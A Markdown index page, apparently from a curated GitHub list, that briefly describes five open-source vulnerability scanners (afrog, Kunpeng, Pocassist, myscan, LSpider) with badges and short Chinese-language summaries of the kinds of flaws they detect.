vulnerability_assessment 2 | 3 | 1. [afrog](#afrog) 4 | 2. [Kunpeng](#kunpeng) 5 | 3. [Pocassist](#pocassist) 6 | 4. [myscan](#myscan) 7 | 5. [LSpider](#lspider) 8 | 9 | ---------------------------------------- 10 | 11 | ### [afrog](detail/afrog.md) 12 | ![Author](https://img.shields.io/badge/Author-zan8in-orange) 13 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 14 | ![GitHub stars](https://img.shields.io/github/stars/zan8in/afrog.svg?style=flat&logo=github) 15 | ![Version](https://img.shields.io/badge/Version-V3.1.7-red) 16 | 17 | 18 | 19 | afrog 是一款性能卓越、快速稳定、PoC 可定制的漏洞扫描工具,PoC 包含 CVE、CNVD、默认口令、信息泄露、指纹识别、未授权访问、任意文件读取、命令执行等多种漏洞类型,帮助网络安全从业者快速验证并及时修复漏洞。 20 | 21 | ### [Kunpeng](detail/Kunpeng.md) 22 | ![Author](https://img.shields.io/badge/Author-opensec-orange) 23 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 24 | ![GitHub stars](https://img.shields.io/github/stars/opensec-cn/kunpeng.svg?style=flat&logo=github) 25 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 26 | 27 | 28 | 29 | Kunpeng是一个Golang编写的开源POC检测框架,集成了包括数据库、中间件、web组件、cms等等的漏洞POC,可检测弱口令、SQL注入、XSS、RCE等漏洞类型,以动态链接库的形式提供调用,通过此项目可快速开发漏洞检测类的系统,比攻击者快一步发现风险漏洞。 30 | 31 | ### [Pocassist](detail/Pocassist.md) 32 | ![Author](https://img.shields.io/badge/Author-jweny-orange) 33 | ![Language](https://img.shields.io/badge/Language-Golang-blue) 34 | ![GitHub stars](https://img.shields.io/github/stars/jweny/pocassist.svg?style=flat&logo=github) 35 | ![Version](https://img.shields.io/badge/Version-V1.0.5-red) 36 | 37 | 38 | 39 | Pocassist 是一个 Golang 编写的全新开源漏洞测试框架,帮助安全人员专注于漏洞验证的逻辑的实现。Pocassist 提供了简洁的 Web 图形化界面,用户可以在线编辑漏洞验证程序即可进行批量的测试;规则完全兼容 xray,可以直接使用现有开源的 PoC 库,同时也支持添加自定义规则。 40 | 41 | ### [myscan](detail/myscan.md) 42 | ![Author](https://img.shields.io/badge/Author-amcai-orange) 43 | ![Language](https://img.shields.io/badge/Language-Python-blue) 44 | ![GitHub stars](https://img.shields.io/github/stars/amcai/myscan.svg?style=flat&logo=github) 45 | ![Version](https://img.shields.io/badge/Version-V1.0.0-red) 46 | 47 | 48 | 49 | myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。 50 | 51 | ### [LSpider](detail/LSpider.md) 52 | ![Author](https://img.shields.io/badge/Author-LoRexxar-orange) 53 | ![Language](https://img.shields.io/badge/Language-Python-blue) 54 | ![GitHub stars](https://img.shields.io/github/stars/knownsec/LSpider.svg?style=flat&logo=github) 55 | ![Version](https://img.shields.io/badge/Version-V1.0.2-red) 56 | 57 | 58 | 59 | LSpider 一个为被动扫描器定制的前端爬虫 60 | 61 | --------------------------------------------------------------------------------